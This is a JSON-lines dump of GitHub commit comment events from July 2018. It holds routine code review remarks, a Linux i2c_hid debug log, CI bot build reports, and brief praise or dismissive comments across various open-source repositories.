{"id":"8008638740","type":"CommitCommentEvent","actor":{"login":"AkihiroSuda"},"repo":{"name":"AkihiroSuda/slirp4netns"},"payload":{"comment":{"id":29810755,"position":135,"line":265,"path":"main.c","commit_id":"61f0d52b384a8af1578ebe086d78ea2062daecd4","created_at":"2018-07-24T08:32:26Z","updated_at":"2018-07-24T08:32:26Z","author_association":"OWNER","body":"where is this flag used?"}},"created_at":"2018-07-24T08:32:26Z"}
{"id":"8008640987","type":"CommitCommentEvent","actor":{"login":"AkihiroSuda"},"repo":{"name":"AkihiroSuda/slirp4netns"},"payload":{"comment":{"id":29810761,"position":135,"line":265,"path":"main.c","commit_id":"61f0d52b384a8af1578ebe086d78ea2062daecd4","created_at":"2018-07-24T08:32:53Z","updated_at":"2018-07-24T08:32:53Z","author_association":"OWNER","body":"Also maybe this can be bool (stdbool.h)"}},"created_at":"2018-07-24T08:32:53Z"}
{"id":"8008641169","type":"CommitCommentEvent","actor":{"login":"resultingforce"},"repo":{"name":"Heat-Ledger-Ltd/heat-ui"},"payload":{"comment":{"id":29810763,"position":63,"line":208,"path":"app/src/services/SettingsService.ts","commit_id":"66446b551ec8cb4f49bc5970dd1d5029f6c1d111","created_at":"2018-07-24T08:32:55Z","updated_at":"2018-07-24T08:32:55Z","author_association":"COLLABORATOR","body":"You are right. Fixed - [https://github.com/Heat-Ledger-Ltd/heat-ui/commit/5de113fc2a1e294f2590d6c6a5fb1a716e2ad999](url)"}},"created_at":"2018-07-24T08:32:55Z"}
{"id":"8008647037","type":"CommitCommentEvent","actor":{"login":"JoakimLarsson"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29810777,"position":null,"line":null,"path":null,"commit_id":"10094b242a52629dbe8ebcbe4e6cb81915381256","created_at":"2018-07-24T08:34:07Z","updated_at":"2018-07-24T08:34:07Z","author_association":"CONTRIBUTOR","body":"Maybe it is intentional but wouldn't this cause m_AC to keep its old value in case of the if failing? This is a change in behavior for m_cpu_version < 0x400  "}},"created_at":"2018-07-24T08:34:07Z"}
{"id":"8008647336","type":"CommitCommentEvent","actor":{"login":"AkihiroSuda"},"repo":{"name":"AkihiroSuda/slirp4netns"},"payload":{"comment":{"id":29810778,"position":129,"line":260,"path":"main.c","commit_id":"61f0d52b384a8af1578ebe086d78ea2062daecd4","created_at":"2018-07-24T08:34:11Z","updated_at":"2018-07-24T08:34:11Z","author_association":"OWNER","body":"nit: Where is this ordering convention defined?"}},"created_at":"2018-07-24T08:34:11Z"}
{"id":"8008647825","type":"CommitCommentEvent","actor":{"login":"shan0817"},"repo":{"name":"shan0817/CAddAddLearning"},"payload":{"comment":{"id":29810780,"position":null,"line":null,"path":null,"commit_id":"46d420334a370932d94fda002b32c6a050c3d5bd","created_at":"2018-07-24T08:34:16Z","updated_at":"2018-07-24T08:34:16Z","author_association":"OWNER","body":"1、Normal Feature calculate &&curvature Feature Calculate test;\r\n2、sift3D Feature keypoints detection and FPFH descriptors."}},"created_at":"2018-07-24T08:34:16Z"}
{"id":"8008649565","type":"CommitCommentEvent","actor":{"login":"t-shimada-motapp"},"repo":{"name":"yamachu/RealmNetCoreSample"},"payload":{"comment":{"id":29810784,"position":null,"line":null,"path":null,"commit_id":"1b5f2ee7f3f9ef13de47bd75223296f84840d083","created_at":"2018-07-24T08:34:35Z","updated_at":"2018-07-24T08:34:35Z","author_association":"NONE","body":"serverのipv6を有効化すればいい"}},"created_at":"2018-07-24T08:34:35Z"}
{"id":"8008651756","type":"CommitCommentEvent","actor":{"login":"DavidRymer"},"repo":{"name":"ChiZhangCZ/JavaExercises"},"payload":{"comment":{"id":29810791,"position":1,"line":1,"path":".metadata/.log","commit_id":"4659126ac9799de5c21c10fb6ad0164dac0928e6","created_at":"2018-07-24T08:35:01Z","updated_at":"2018-07-24T08:35:01Z","author_association":"NONE","body":"rubbish\r\n"}},"created_at":"2018-07-24T08:35:01Z"}
{"id":"8008651931","type":"CommitCommentEvent","actor":{"login":"Babafari"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29810792,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T08:35:03Z","updated_at":"2018-07-24T08:35:03Z","author_association":"NONE","body":"Great project "}},"created_at":"2018-07-24T08:35:03Z"}
{"id":"8008653164","type":"CommitCommentEvent","actor":{"login":"DavidRymer"},"repo":{"name":"ChiZhangCZ/JavaExercises"},"payload":{"comment":{"id":29810796,"position":4,"line":4,"path":".metadata/.plugins/org.eclipse.core.runtime/.settings/org.eclipse.jdt.ui.prefs","commit_id":"4659126ac9799de5c21c10fb6ad0164dac0928e6","created_at":"2018-07-24T08:35:16Z","updated_at":"2018-07-24T08:35:16Z","author_association":"NONE","body":"garbage"}},"created_at":"2018-07-24T08:35:16Z"}
{"id":"8008654498","type":"CommitCommentEvent","actor":{"login":"duguyitian"},"repo":{"name":"duguyitian/NeverGiveUp"},"payload":{"comment":{"id":29810798,"position":2,"line":2,"path":"helloworld.c","commit_id":"915aaf2dca54dd9133d981c3133271bb425d002b","created_at":"2018-07-24T08:35:31Z","updated_at":"2018-07-24T08:35:31Z","author_association":"OWNER","body":"int g_test = 0;"}},"created_at":"2018-07-24T08:35:31Z"}
{"id":"8008655097","type":"CommitCommentEvent","actor":{"login":"cdent"},"repo":{"name":"cdent/os-resource-classes"},"payload":{"comment":{"id":29810801,"position":44,"line":44,"path":"os_resource_classes/__init__.py","commit_id":"e1094e23c3070e791f3f1a1f9837e1f7a42de862","created_at":"2018-07-24T08:35:39Z","updated_at":"2018-07-24T08:35:39Z","author_association":"OWNER","body":"If we move forward on this I'll put that in as a todo so we don't have to get hung up on the implementation details: three phases:\r\n\r\n# this\r\n# this, but with the data in yaml in it\r\n# yaml somewhere else\r\n\r\n?"}},"created_at":"2018-07-24T08:35:39Z"}
{"id":"8008661217","type":"CommitCommentEvent","actor":{"login":"duguyitian"},"repo":{"name":"duguyitian/NeverGiveUp"},"payload":{"comment":{"id":29810809,"position":null,"line":null,"path":null,"commit_id":"915aaf2dca54dd9133d981c3133271bb425d002b","created_at":"2018-07-24T08:36:46Z","updated_at":"2018-07-24T08:36:46Z","author_association":"OWNER","body":"the second time to commit."}},"created_at":"2018-07-24T08:36:46Z"}
{"id":"8008671405","type":"CommitCommentEvent","actor":{"login":"dadabosade"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29810828,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T08:38:44Z","updated_at":"2018-07-24T08:38:44Z","author_association":"NONE","body":"Nice!"}},"created_at":"2018-07-24T08:38:44Z"}
{"id":"8008678188","type":"CommitCommentEvent","actor":{"login":"qwIvan"},"repo":{"name":"torvalds/linux"},"payload":{"comment":{"id":29810839,"position":null,"line":null,"path":null,"commit_id":"ac75a041048b8c1f7418e27621ca5efda8571043","created_at":"2018-07-24T08:40:03Z","updated_at":"2018-07-24T08:40:03Z","author_association":"NONE","body":"execute `modprobe i2c_hid debug=1` then got the follow logs in dmesg:\r\n```\r\n[20752.732087] i2c_hid i2c-ELAN2203:00: i2c-ELAN2203:00 supply vdd not found, using dummy regulator\r\n[20752.732247] i2c_hid i2c-ELAN2203:00: Fetching the HID descriptor\r\n[20752.732252] i2c_hid i2c-ELAN2203:00: __i2c_hid_command: cmd=01 00\r\n[20752.733369] i2c_hid i2c-ELAN2203:00: HID Descriptor: 1e 00 00 01 7d 01 02 00 03 00 0e 00 04 00 00 00 05 00 06 00 f3 04 9a 30 01 00 00 00 00 00\r\n[20752.733503] i2c_hid i2c-ELAN2203:00: entering i2c_hid_parse\r\n[20752.733506] i2c_hid i2c-ELAN2203:00: i2c_hid_hwreset\r\n[20752.733508] i2c_hid i2c-ELAN2203:00: i2c_hid_set_power\r\n[20752.733511] i2c_hid i2c-ELAN2203:00: __i2c_hid_command: cmd=05 00 00 08\r\n[20752.736702] i2c_hid i2c-ELAN2203:00: resetting...\r\n[20752.736705] i2c_hid i2c-ELAN2203:00: __i2c_hid_command: cmd=05 00 00 01\r\n[20752.736941] i2c_hid i2c-ELAN2203:00: __i2c_hid_command: waiting...\r\n[20757.926782] i2c_hid i2c-ELAN2203:00: __i2c_hid_command: finished.\r\n[20757.926786] i2c_hid i2c-ELAN2203:00: failed to reset device.\r\n[20757.926792] i2c_hid i2c-ELAN2203:00: i2c_hid_set_power\r\n[20757.926796] i2c_hid i2c-ELAN2203:00: __i2c_hid_command: cmd=05 00 01 08\r\n[20758.940048] i2c_hid i2c-ELAN2203:00: i2c_hid_hwreset\r\n[20758.940052] i2c_hid i2c-ELAN2203:00: i2c_hid_set_power\r\n[20758.940055] i2c_hid i2c-ELAN2203:00: __i2c_hid_command: cmd=05 00 00 08\r\n[20758.943413] i2c_hid i2c-ELAN2203:00: resetting...\r\n[20758.943417] i2c_hid i2c-ELAN2203:00: __i2c_hid_command: cmd=05 00 00 01\r\n[20758.943637] i2c_hid i2c-ELAN2203:00: __i2c_hid_command: waiting...\r\n[20764.113453] i2c_hid i2c-ELAN2203:00: __i2c_hid_command: finished.\r\n[20764.113457] i2c_hid i2c-ELAN2203:00: failed to reset device.\r\n[20764.113463] i2c_hid i2c-ELAN2203:00: i2c_hid_set_power\r\n[20764.113467] i2c_hid i2c-ELAN2203:00: __i2c_hid_command: cmd=05 00 01 08\r\n[20765.126776] i2c_hid i2c-ELAN2203:00: i2c_hid_hwreset\r\n[20765.126780] i2c_hid i2c-ELAN2203:00: i2c_hid_set_power\r\n[20765.126783] i2c_hid i2c-ELAN2203:00: __i2c_hid_command: cmd=05 00 00 08\r\n[20765.130102] i2c_hid i2c-ELAN2203:00: resetting...\r\n[20765.130106] i2c_hid i2c-ELAN2203:00: __i2c_hid_command: cmd=05 00 00 01\r\n[20765.130528] i2c_hid i2c-ELAN2203:00: __i2c_hid_command: waiting...\r\n[20770.300128] i2c_hid i2c-ELAN2203:00: __i2c_hid_command: finished.\r\n[20770.300130] i2c_hid i2c-ELAN2203:00: failed to reset device.\r\n[20770.300135] i2c_hid i2c-ELAN2203:00: i2c_hid_set_power\r\n[20770.300137] i2c_hid i2c-ELAN2203:00: __i2c_hid_command: cmd=05 00 01 08\r\n[20771.313462] i2c_hid i2c-ELAN2203:00: i2c_hid_hwreset\r\n[20771.313466] i2c_hid i2c-ELAN2203:00: i2c_hid_set_power\r\n[20771.313469] i2c_hid i2c-ELAN2203:00: __i2c_hid_command: cmd=05 00 00 08\r\n[20771.316775] i2c_hid i2c-ELAN2203:00: resetting...\r\n[20771.316777] i2c_hid i2c-ELAN2203:00: __i2c_hid_command: cmd=05 00 00 01\r\n[20771.317049] i2c_hid i2c-ELAN2203:00: __i2c_hid_command: waiting...\r\n[20776.486794] i2c_hid i2c-ELAN2203:00: __i2c_hid_command: finished.\r\n[20776.486798] i2c_hid i2c-ELAN2203:00: failed to reset device.\r\n[20776.486803] i2c_hid i2c-ELAN2203:00: i2c_hid_set_power\r\n[20776.486805] i2c_hid i2c-ELAN2203:00: __i2c_hid_command: cmd=05 00 01 08\r\n[20777.500376] i2c_hid i2c-ELAN2203:00: can't add hid device: -61\r\n[20777.500558] i2c_hid: probe of i2c-ELAN2203:00 failed with error -61\r\n```"}},"created_at":"2018-07-24T08:40:03Z"}
{"id":"8008679411","type":"CommitCommentEvent","actor":{"login":"tbaddade"},"repo":{"name":"FriendsOfREDAXO/redactor2"},"payload":{"comment":{"id":29810841,"position":null,"line":null,"path":null,"commit_id":"92f02ef75b27731db603dd6d91bd5731ebe13f93","created_at":"2018-07-24T08:40:18Z","updated_at":"2018-07-24T08:40:18Z","author_association":"MEMBER","body":"Hier noch einmal die Stellen korrekt verlinkt\r\nhttps://github.com/FriendsOfREDAXO/redactor2/blob/3.4.5/boot.php#L43\r\nhttps://github.com/FriendsOfREDAXO/redactor2/blob/3.4.5/boot.php#L127\r\n\r\nWenn das Cachefile existiert, wird das CustomPlugin nie geladen. Aktuell lade ich es direkt in der boot.php des Project AddOns."}},"created_at":"2018-07-24T08:40:18Z"}
{"id":"8008679471","type":"CommitCommentEvent","actor":{"login":"sanmai-NL"},"repo":{"name":"hyperium/http"},"payload":{"comment":{"id":29810842,"position":null,"line":null,"path":null,"commit_id":"ab2ca71ead2a07e861a30637dc3fe1c300701a4e","created_at":"2018-07-24T08:40:19Z","updated_at":"2018-07-24T08:40:19Z","author_association":"NONE","body":"Does this have any security implications? I do not fully grasp the code yet so bear with me. To start with, I could not figure out quickly what the extensions do. I could not find out much via https://docs.rs/http/0.1.8/. Could you explain it a bit more? Is that related to https://www.w3.org/Protocols/HTTP/ietf-http-ext/. \r\n\r\nWould it be possible to send in a malicious request and make the server deserialize it to a value of some unexpected type? Surely you will have thought about this, but this stuff could be fishy.."}},"created_at":"2018-07-24T08:40:19Z"}
{"id":"8008684821","type":"CommitCommentEvent","actor":{"login":"hemanthmeka"},"repo":{"name":"SnappyDataInc/snappydata"},"payload":{"comment":{"id":29810853,"position":7,"line":610,"path":"core/src/main/scala/org/apache/spark/sql/SnappyParser.scala","commit_id":"1762317c329f0e2eb42848a0b83c8186b418ee17","created_at":"2018-07-24T08:41:19Z","updated_at":"2018-07-24T08:41:19Z","author_association":"CONTRIBUTOR","body":"DISABLE_TOKENIZE is added. without it param literals in query with inline table are treated as unfoldable and test is failing. Later reverting value of canTokenize. Referred with @kneeraj for this change"}},"created_at":"2018-07-24T08:41:19Z"}
{"id":"8008695550","type":"CommitCommentEvent","actor":{"login":"hemanthmeka"},"repo":{"name":"SnappyDataInc/snappydata"},"payload":{"comment":{"id":29810868,"position":21,"line":775,"path":"core/src/main/scala/org/apache/spark/sql/SnappyParser.scala","commit_id":"1762317c329f0e2eb42848a0b83c8186b418ee17","created_at":"2018-07-24T08:43:18Z","updated_at":"2018-07-24T08:43:18Z","author_association":"CONTRIBUTOR","body":"inline table name in the query with inline table is getting matched against \"relationFactor\" falsely and is skipping the rule \"inlineTable\" hence had to switch the sequence."}},"created_at":"2018-07-24T08:43:18Z"}
{"id":"8008696614","type":"CommitCommentEvent","actor":{"login":"plegall"},"repo":{"name":"modus75/piwigo-gmaps"},"payload":{"comment":{"id":29810873,"position":5,"line":375,"path":"include/functions_map.php","commit_id":"f27ab58bfba8d5b2825307ec7301055dc76ac8a1","created_at":"2018-07-24T08:43:30Z","updated_at":"2018-07-24T08:43:30Z","author_association":"NONE","body":"by the way, using query2array is recommended compared to the old function hash_from_query :-)"}},"created_at":"2018-07-24T08:43:30Z"}
{"id":"8008700024","type":"CommitCommentEvent","actor":{"login":"hemanthmeka"},"repo":{"name":"SnappyDataInc/snappydata"},"payload":{"comment":{"id":29810876,"position":31,"line":918,"path":"core/src/main/scala/org/apache/spark/sql/SnappyParser.scala","commit_id":"1762317c329f0e2eb42848a0b83c8186b418ee17","created_at":"2018-07-24T08:44:10Z","updated_at":"2018-07-24T08:44:10Z","author_association":"CONTRIBUTOR","body":"\"select CURRENT_DATE()\" is failing because of the extra \"()\". so matching it as optional"}},"created_at":"2018-07-24T08:44:10Z"}
{"id":"8008702475","type":"CommitCommentEvent","actor":{"login":"jasonyu1996"},"repo":{"name":"char-fish-after-lunch/uCat"},"payload":{"comment":{"id":29810882,"position":null,"line":null,"path":null,"commit_id":"a26fb2e7c0eac9a80cb2a0bfe6596185ed9760b1","created_at":"2018-07-24T08:44:37Z","updated_at":"2018-07-24T08:44:37Z","author_association":"COLLABORATOR","body":"This is also relevant to #2 "}},"created_at":"2018-07-24T08:44:37Z"}
{"id":"8008705686","type":"CommitCommentEvent","actor":{"login":"Somoey"},"repo":{"name":"Somoey/first_learn"},"payload":{"comment":{"id":29810888,"position":null,"line":null,"path":null,"commit_id":"0acb09b2ef7d9ed7ed55ad3608ed0e16356cd934","created_at":"2018-07-24T08:45:13Z","updated_at":"2018-07-24T08:45:13Z","author_association":"OWNER","body":"用来test修改名称"}},"created_at":"2018-07-24T08:45:13Z"}
{"id":"8008706983","type":"CommitCommentEvent","actor":{"login":"HazeDevelopment"},"repo":{"name":"HazeDevelopment/bukz"},"payload":{"comment":{"id":29810892,"position":null,"line":null,"path":null,"commit_id":"4a58fee2405ed2612bc6cc73fa5885d99d15e06d","created_at":"2018-07-24T08:45:27Z","updated_at":"2018-07-24T08:45:27Z","author_association":"OWNER","body":"Fix is not for GUI.\r\nWas working on 2 commits at once made a mistake.\r\nFix is just for general Compile error."}},"created_at":"2018-07-24T08:45:27Z"}
{"id":"8008709667","type":"CommitCommentEvent","actor":{"login":"Nikvt"},"repo":{"name":"Nikvt/Articles-front-for-api"},"payload":{"comment":{"id":29810897,"position":12,"line":12,"path":"spec/interactors/mail_to_comment_receiver_spec.rb","commit_id":"45e97261505e26ddcb046ae16b566a1f6408855e","created_at":"2018-07-24T08:45:58Z","updated_at":"2018-07-24T08:45:58Z","author_association":"OWNER","body":"Ok, je testerai après l'app xml =) "}},"created_at":"2018-07-24T08:45:58Z"}
{"id":"8008710223","type":"CommitCommentEvent","actor":{"login":"fmarchetti88"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29810899,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T08:46:04Z","updated_at":"2018-07-24T08:46:04Z","author_association":"NONE","body":"great!"}},"created_at":"2018-07-24T08:46:04Z"}
{"id":"8008713197","type":"CommitCommentEvent","actor":{"login":"phoebusryan"},"repo":{"name":"FriendsOfREDAXO/redactor2"},"payload":{"comment":{"id":29810906,"position":null,"line":null,"path":null,"commit_id":"92f02ef75b27731db603dd6d91bd5731ebe13f93","created_at":"2018-07-24T08:46:38Z","updated_at":"2018-07-24T08:46:38Z","author_association":"MEMBER","body":"Achso. Mensch, jetzt stand ich total auf dem Schlauch. Danke fürs klären. Ich such ne Lösung dafür. :-)"}},"created_at":"2018-07-24T08:46:38Z"}
{"id":"8008714335","type":"CommitCommentEvent","actor":{"login":"gdementen"},"repo":{"name":"larray-project/larray"},"payload":{"comment":{"id":29810909,"position":28,"line":84,"path":"larray/inout/csv.py","commit_id":"f3714f161479fabc9df87ff199de90834702e913","created_at":"2018-07-24T08:46:51Z","updated_at":"2018-07-24T08:46:51Z","author_association":"CONTRIBUTOR","body":"I don't think this line is necessary"}},"created_at":"2018-07-24T08:46:51Z"}
{"id":"8008718999","type":"CommitCommentEvent","actor":{"login":"galichkamali4kasa21"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29810915,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T08:47:45Z","updated_at":"2018-07-24T08:47:45Z","author_association":"NONE","body":"Very nice Project!!!"}},"created_at":"2018-07-24T08:47:45Z"}
{"id":"8008721240","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"ImpladeDeveloped/Implactor"},"payload":{"comment":{"id":29810920,"position":null,"line":null,"path":null,"commit_id":"68fbed6384c3624cc2336935b6f154f85a9161b5","created_at":"2018-07-24T08:48:12Z","updated_at":"2018-07-24T08:48:12Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: Level 0: yaml_parse(): parsing error encountered\nduring parsing: did not find expected '-' indicator (line 4, column 1),\ncontext while parsing a block collection (line 3, column 1) in\n/poggit/src/poggit/webhook/PullRequestHandler.php#72\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/ImpladeDeveloped/Implactor/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `49cd1cd0-8f1e-11e8-846e-e749e0c249f2`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-24T08:48:12Z"}
{"id":"8008724988","type":"CommitCommentEvent","actor":{"login":"maakep"},"repo":{"name":"maakep/cgj2018"},"payload":{"comment":{"id":29810926,"position":8,"line":16,"path":"Assets/Ability/Immolation/ImmolationAbility.cs","commit_id":"7942ef26c118d666d445721d69a0209cf538ab92","created_at":"2018-07-24T08:48:54Z","updated_at":"2018-07-24T08:48:54Z","author_association":"OWNER","body":"Think I forgot to test this one, was this an OK change @ProgHaj? I think it was reported as not being used."}},"created_at":"2018-07-24T08:48:54Z"}
{"id":"8008725911","type":"CommitCommentEvent","actor":{"login":"gdementen"},"repo":{"name":"larray-project/larray"},"payload":{"comment":{"id":29810930,"position":27,"line":83,"path":"larray/inout/csv.py","commit_id":"f3714f161479fabc9df87ff199de90834702e913","created_at":"2018-07-24T08:49:05Z","updated_at":"2018-07-24T08:49:05Z","author_association":"CONTRIBUTOR","body":"The data below is a subset of the demo_pjan table from Eurostat"}},"created_at":"2018-07-24T08:49:05Z"}
{"id":"8008726795","type":"CommitCommentEvent","actor":{"login":"giuseppe"},"repo":{"name":"AkihiroSuda/slirp4netns"},"payload":{"comment":{"id":29810932,"position":129,"line":260,"path":"main.c","commit_id":"61f0d52b384a8af1578ebe086d78ea2062daecd4","created_at":"2018-07-24T08:49:15Z","updated_at":"2018-07-24T08:49:15Z","author_association":"NONE","body":"I've changed it as `getopt` was raising a warning as it wants a `char * const argv[]`"}},"created_at":"2018-07-24T08:49:15Z"}
{"id":"8008728007","type":"CommitCommentEvent","actor":{"login":"giuseppe"},"repo":{"name":"AkihiroSuda/slirp4netns"},"payload":{"comment":{"id":29810934,"position":135,"line":265,"path":"main.c","commit_id":"61f0d52b384a8af1578ebe086d78ea2062daecd4","created_at":"2018-07-24T08:49:30Z","updated_at":"2018-07-24T08:49:30Z","author_association":"NONE","body":"yes sorry, I was not using it.  Fixed it and changed the type to a `bool`"}},"created_at":"2018-07-24T08:49:30Z"}
{"id":"8008739310","type":"CommitCommentEvent","actor":{"login":"royduin"},"repo":{"name":"SublimeLinter/SublimeLinter-phpcs"},"payload":{"comment":{"id":29810973,"position":null,"line":null,"path":null,"commit_id":"e817cd4935345e25170e3dd45acc5ff4b03cc6fb","created_at":"2018-07-24T08:51:41Z","updated_at":"2018-07-24T08:51:41Z","author_association":"NONE","body":"I've added `\"SublimeLinter.linters.phpcs.args\": \"--standard=PSR2\"` to my `Preferences.sublime-settings` file."}},"created_at":"2018-07-24T08:51:41Z"}
{"id":"8008739905","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"ShokoAnime/ShokoServer"},"payload":{"comment":{"id":29810974,"position":null,"line":null,"path":null,"commit_id":"3a560e6f9c74f737e651121d05765de342fe46e9","created_at":"2018-07-24T08:51:48Z","updated_at":"2018-07-24T08:51:48Z","author_association":"CONTRIBUTOR","body":"Just from curiosity, so you basically revers dotnet version for better mono/linux compatible or there is something else related with it ?"}},"created_at":"2018-07-24T08:51:48Z"}
{"id":"8008741963","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29810982,"position":null,"line":null,"path":null,"commit_id":"48202596cd38b37c2304ed87c37e5a6142992058","created_at":"2018-07-24T08:52:09Z","updated_at":"2018-07-24T08:52:09Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2981 of 2984 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 640\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-48202596cd38b37c2304ed87c37e5a6142992058-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-48202596cd38b37c2304ed87c37e5a6142992058-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-24T08:52:09Z"}
{"id":"8008744448","type":"CommitCommentEvent","actor":{"login":"hhoxStar"},"repo":{"name":"hhoxStar/Practice"},"payload":{"comment":{"id":29810990,"position":2,"line":2,"path":"README.md","commit_id":"7fdc842c29a25fff14bf9403dce1153e1fc08a9e","created_at":"2018-07-24T08:52:36Z","updated_at":"2018-07-24T08:52:36Z","author_association":"OWNER","body":"2018年7月大数据实训"}},"created_at":"2018-07-24T08:52:36Z"}
{"id":"8008745649","type":"CommitCommentEvent","actor":{"login":"caorol"},"repo":{"name":"jiyuujin/ProgateJava"},"payload":{"comment":{"id":29810993,"position":31,"line":31,"path":"src/io/jiyuujin/java/day22/GamePlayer.java","commit_id":"6b4ce3484db34684268fbc677a55bd06fc72eefe","created_at":"2018-07-24T08:52:49Z","updated_at":"2018-07-24T08:52:49Z","author_association":"COLLABORATOR","body":"人の情報を出力する"}},"created_at":"2018-07-24T08:52:49Z"}
{"id":"8008746806","type":"CommitCommentEvent","actor":{"login":"dimaep"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29810994,"position":207,"line":401,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"0f9a24b117fa5163411fe87047c388196620050a","created_at":"2018-07-24T08:53:02Z","updated_at":"2018-07-24T08:53:02Z","author_association":"NONE","body":"It is better to use rte_pktmbuf_mtod_offset(m, t, o)"}},"created_at":"2018-07-24T08:53:02Z"}
{"id":"8008747462","type":"CommitCommentEvent","actor":{"login":"tbazant"},"repo":{"name":"SUSE/doc-ses"},"payload":{"comment":{"id":29810995,"position":null,"line":null,"path":null,"commit_id":"dffc2cf2ae1407d308c7f75d8206989bebf85fd2","created_at":"2018-07-24T08:53:09Z","updated_at":"2018-07-24T08:53:09Z","author_association":"COLLABORATOR","body":"[ds.osd.replace_color_en.pdf](https://github.com/SUSE/doc-ses/files/2222781/ds.osd.replace_color_en.pdf)\r\n"}},"created_at":"2018-07-24T08:53:09Z"}
{"id":"8008748610","type":"CommitCommentEvent","actor":{"login":"caorol"},"repo":{"name":"jiyuujin/ProgateJava"},"payload":{"comment":{"id":29811014,"position":31,"line":31,"path":"src/io/jiyuujin/java/day22/GamePlayer.java","commit_id":"6b4ce3484db34684268fbc677a55bd06fc72eefe","created_at":"2018-07-24T08:53:21Z","updated_at":"2018-07-24T08:53:21Z","author_association":"COLLABORATOR","body":"メソッドのコメントにメソッド内の一部の処理の内容を書いちゃ駄目"}},"created_at":"2018-07-24T08:53:21Z"}
{"id":"8008751601","type":"CommitCommentEvent","actor":{"login":"Cazzar"},"repo":{"name":"ShokoAnime/ShokoServer"},"payload":{"comment":{"id":29811062,"position":null,"line":null,"path":null,"commit_id":"3a560e6f9c74f737e651121d05765de342fe46e9","created_at":"2018-07-24T08:53:54Z","updated_at":"2018-07-24T08:53:54Z","author_association":"CONTRIBUTOR","body":"Better compatilibity with linux.\r\nusing the lighter .net standard.\r\ncan be more cross platform without having to use middle-ware.\r\nalso we have moved to ASP+Kesterel & EF instead of Nancy & NHibernate"}},"created_at":"2018-07-24T08:53:54Z"}
{"id":"8008752882","type":"CommitCommentEvent","actor":{"login":"rxwei"},"repo":{"name":"tensorflow/swift-bindings"},"payload":{"comment":{"id":29811065,"position":null,"line":null,"path":null,"commit_id":"f3041a5c3a66849915e5a63b062260d8fcfb1873","created_at":"2018-07-24T08:54:09Z","updated_at":"2018-07-24T08:54:09Z","author_association":"MEMBER","body":"Great! I was just gonna update this."}},"created_at":"2018-07-24T08:54:09Z"}
{"id":"8008754409","type":"CommitCommentEvent","actor":{"login":"Rapster"},"repo":{"name":"omnifaces/omnifaces"},"payload":{"comment":{"id":29811066,"position":13,"line":66,"path":"src/main/java/org/omnifaces/taghandler/TagAttribute.java","commit_id":"488000c53d3f4eeb6d96f1ea1d237904d4869fd2","created_at":"2018-07-24T08:54:25Z","updated_at":"2018-07-24T08:54:25Z","author_association":"NONE","body":"Typo here: double for"}},"created_at":"2018-07-24T08:54:25Z"}
{"id":"8008754658","type":"CommitCommentEvent","actor":{"login":"tivisse"},"repo":{"name":"odoo/documentation-user"},"payload":{"comment":{"id":29811067,"position":null,"line":null,"path":null,"commit_id":"3e3c26b380dcec8e12508962cf458b44eac0e5d8","created_at":"2018-07-24T08:54:27Z","updated_at":"2018-07-24T08:54:27Z","author_association":"COLLABORATOR","body":"Hi. \r\n\r\nThe commit messages should follow this pattern.\r\n[TAG] module_name: commit message\r\n \r\nWhere tag could be: IMP, FIX, REM, ...\r\n\r\nAs this commit is a fix, the commit message should be: \r\n[FIX] point_of_sale: Fix typo in reprint.rst\r\n\r\nCould you please follow this guideline for your next developments ? \r\n\r\nThanks."}},"created_at":"2018-07-24T08:54:27Z"}
